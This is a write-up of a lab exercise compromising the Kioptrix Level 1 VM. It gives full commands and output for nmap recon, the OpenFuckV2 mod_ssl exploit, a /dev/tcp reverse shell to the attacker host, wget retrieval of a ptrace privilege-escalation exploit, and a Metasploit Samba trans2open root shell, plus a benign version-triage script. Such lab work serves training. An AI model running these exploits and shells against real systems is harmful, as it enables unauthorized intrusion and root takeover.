Contents
Information gathering:
1. Host discovery
nmap -sn -r 192.168.229.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 01:02 EST
Nmap scan report for 192.168.229.63 // target machine found
Host is up (0.00058s latency).
MAC Address: 00:0C:29:74:D4:C2 (VMware)
Nmap scan report for 192.168.229.85
Host is up (0.47s latency).
MAC Address: 92:5E:53:E7:CD:5E (Unknown)
Nmap scan report for 192.168.229.247
Host is up (0.00058s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for 192.168.229.234
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.34 seconds
2. Port scan
nmap -sT -p- 192.168.229.63
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 01:11 EST
Nmap scan report for 192.168.229.63
Host is up (0.0020s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:74:D4:C2 (VMware)
3. Service scan
nmap -sT -sV --version-all -O 192.168.229.63 -p 22,80,111,139,443,1024
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 01:29 EST
Nmap scan report for 192.168.229.63
Host is up (0.00089s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:74:D4:C2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Exploitation:
4. Searching for vulnerabilities
searchsploit mod_ssl
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow | unix/remote/40347.txt
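Added example, not part of the original write-up: a small Python triage script that parses the nmap -sV service lines from the scan above and flags the components whose versions fall inside the vulnerable ranges that searchsploit reports (mod_ssl < 2.8.7, OpenSSL < 0.9.6d). It also lists open ports such as Samba whose banner carries no version and therefore needs a closer fingerprint. The rule table and the sample lines are constructed from this page's output.

```python
import re

# Service lines copied from the nmap -sV scan above (constructed input for this example).
NMAP_LINES = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
"""

# Vulnerable ranges as reported by the searchsploit results above:
# (component, regex capturing its version, first fixed version, reference).
RULES = [
    ("mod_ssl", r"mod_ssl/(\d[\w.]*)", "2.8.7", "OpenFuckV2 remote overflow, CVE-2002-0082"),
    ("OpenSSL", r"OpenSSL/(\d[\w.]*)", "0.9.6d", "openssl-too-open SSL2 KEY_ARG overflow"),
]

def version_key(v):
    """Split '0.9.6b' into ((0,0),(0,9),(0,6),(1,'b')) so numeric parts sort before
    letter suffixes and comparisons never mix int with str."""
    parts = re.findall(r"\d+|[a-z]+", v.lower())
    return tuple((0, int(p)) if p.isdigit() else (1, p) for p in parts)

def triage(nmap_text):
    """Return (findings, unknown): findings are (port, component, version, reference)
    for versions below the fixed release; unknown lists open ports with no version."""
    findings, unknown = [], []
    for line in nmap_text.splitlines():
        m = re.match(r"(\d+)/tcp\s+open\s+(\S+)\s*(.*)", line)
        if not m:
            continue
        port, service, banner = int(m.group(1)), m.group(2), m.group(3)
        if not re.search(r"\d+\.\d+", banner):
            # e.g. Samba smbd without a version: needs a protocol-level probe (smb_version)
            unknown.append((port, service, banner))
            continue
        for name, pattern, fixed, ref in RULES:
            vm = re.search(pattern, banner)
            if vm and version_key(vm.group(1)) < version_key(fixed):
                findings.append((port, name, vm.group(1), ref))
    return findings, unknown

if __name__ == "__main__":
    found, unknown = triage(NMAP_LINES)
    for port, name, ver, ref in found:
        print(f"[!] {port}/tcp {name} {ver} < fixed: {ref}")
    for port, service, banner in unknown:
        print(f"[?] {port}/tcp {service}: no version in banner ({banner})")
```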
5. Exploitation
Remote buffer overflow
searchsploit -m 47080.c
└─# searchsploit -m 47080.c
Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
URL: https://www.exploit-db.com/exploits/47080
Path: /usr/share/exploitdb/exploits/unix/remote/47080.c
Codes: CVE-2002-0082, OSVDB-857
Verified: False
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/47080.c
6. Compile the exploit and run it:
1. First, read how the exploit is meant to be used:
└─# cat 47080.c
/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/
2. Compile it, then run the attack:
gcc -o a 47080.c -lcrypto
47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录
21 | #include <openssl/ssl.h>
| ^~~~~~~~~~~~~~~
compilation terminated.
-------------------------------------------
┌──(root㉿kali)-[/home/kali/Desktop]
└─# sudo apt-get install libssl-dev
gcc -o a 47080.c -lcrypto
-------------------------------------------
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ls
1.txt 47080.c a OneForAll subDomainsBrute
./a
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
: Usage: ./a target box [port] [-c N]
target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
./a 0x6b 192.168.229.63 443 -c 40
// a shell is obtained
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--21:40:03-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$
bash-2.05$ whoami
whoami
apache
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ uname -a
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
bash-2.05$
7. Privilege escalation:
Fetch the privilege-escalation exploit on Kali and serve it over HTTP, then download it on the target with wget and run it.
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
--2023-12-06 20:42:06-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
正在解析主机 dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200
正在连接 dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:3921 (3.8K) [text/x-csrc]
正在保存至: “ptrace-kmod.c”
ptrace-kmod.c 100%[=================>] 3.83K --.-KB/s 用时 0.001s
2023-12-06 20:42:14 (2.90 MB/s) - 已保存 “ptrace-kmod.c” [3921/3921])
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Before downloading on the target, pop a reverse shell first, since the current shell is awkward to work in.
Kali: nc -lvvp 4444
Target: /bin/sh -i >& /dev/tcp/192.168.229.234/4444 0>&1
sh-2.05$ wget http://192.168.229.234:8080/ptrace-kmod.c
wget http://192.168.229.234:8080/ptrace-kmod.c
--21:53:08-- http://192.168.229.234:8080/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.229.234:8080... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
21:53:08 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
sh-2.05$ ls
ls
ptrace-kmod.c
sh-2.05$ gcc -o a ptrace-kmod.c
gcc -o a ptrace-kmod.c
sh-2.05$ ./a
[+] Attached to 1075
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
Method 2:
Information gathering:
The nmap information gathering found a Samba service on port 139; we use msf to check it.
1. Use an msf scanner module to detect the version
search smb
106 auxiliary/scanner/smb/pipe_dcerpc_auditor normal No SMB Session Pipe DCERPC Auditor
107 auxiliary/scanner/smb/smb_enumshares normal No SMB Share Enumeration
108 auxiliary/fuzzers/smb/smb_tree_connect_corrupt normal No SMB Tree Connect Request Corruption
109 auxiliary/fuzzers/smb/smb_tree_connect normal No SMB Tree Connect Request Fuzzer
110 auxiliary/scanner/smb/smb_enumusers normal No SMB User Enumeration (SAM EnumUsers)
111 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
112 auxiliary/dos/smb/smb_loris 2017-06-29 normal No SMBLoris NBSS Denial of Service
113 exploit/windows/local/cve_2020_0796_smbghost 2020-03-13 good Yes SMBv3 Compression Buffer Overflow
114 exploit/windows/smb/cve_2020_0796_smbghost 2020-03-13 average Yes SMBv3 Compression Buffer Overflow
2. Use module 111 (smb_version)
use 111
The version is found to be Samba 2.2.1a
msf6 > use 111
msf6 auxiliary(scanner/smb/smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_version) > set rhost 192.168.229.63
rhost => 192.168.229.63
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.229.63:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.229.63:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.229.63: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
3. Search for a matching exploit
search samba 2.2
msf6 auxiliary(scanner/smb/smb_version) > search samba 2.2
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
1 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
2 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
3 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
4 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/trans2open
4. Exploitation, letting msf do the whole job
msf6 auxiliary(scanner/smb/smb_version) > use 2
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell
set payload linux/x86/shell/bind_ipv6_tcp set payload linux/x86/shell/reverse_ipv6_tcp set payload linux/x86/shell_bind_tcp
set payload linux/x86/shell/bind_ipv6_tcp_uuid set payload linux/x86/shell/reverse_nonx_tcp set payload linux/x86/shell_bind_tcp_random_port
set payload linux/x86/shell/bind_nonx_tcp set payload linux/x86/shell/reverse_tcp set payload linux/x86/shell_reverse_tcp
set payload linux/x86/shell/bind_tcp set payload linux/x86/shell/reverse_tcp_uuid set payload linux/x86/shell_reverse_tcp_ipv6
set payload linux/x86/shell/bind_tcp_uuid set payload linux/x86/shell_bind_ipv6_tcp
msf6 exploit(linux/samba/trans2open) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
View the full module info with the info, or info -d command.
msf6 exploit(linux/samba/trans2open) > set rhost 192.168.229.63
rhost => 192.168.229.63
msf6 exploit(linux/samba/trans2open) > options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.229.63 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.229.63 no The target address
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
View the full module info with the info, or info -d command.
msf6 exploit(linux/samba/trans2open) > run
[*] Started bind TCP handler against 192.168.229.63:4444
[*] 192.168.229.63:139 - Trying return address 0xbffffdfc...
[*] 192.168.229.63:139 - Trying return address 0xbffffcfc...
[*] 192.168.229.63:139 - Trying return address 0xbffffbfc...
[*] 192.168.229.63:139 - Trying return address 0xbffffafc...
[*] 192.168.229.63:139 - Trying return address 0xbffff9fc...
[*] 192.168.229.63:139 - Trying return address 0xbffff8fc...
[*] 192.168.229.63:139 - Trying return address 0xbffff7fc...
[*] 192.168.229.63:139 - Trying return address 0xbffff6fc...
[*] 192.168.229.63:139 - Trying return address 0xbffff5fc...
[*] Command shell session 1 opened (192.168.229.234:41379 -> 192.168.229.63:4444) at 2023-12-06 02:22:52 -0500
whoami
root
id
uid=0(root) gid=0(root) groups=99(nobody)
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown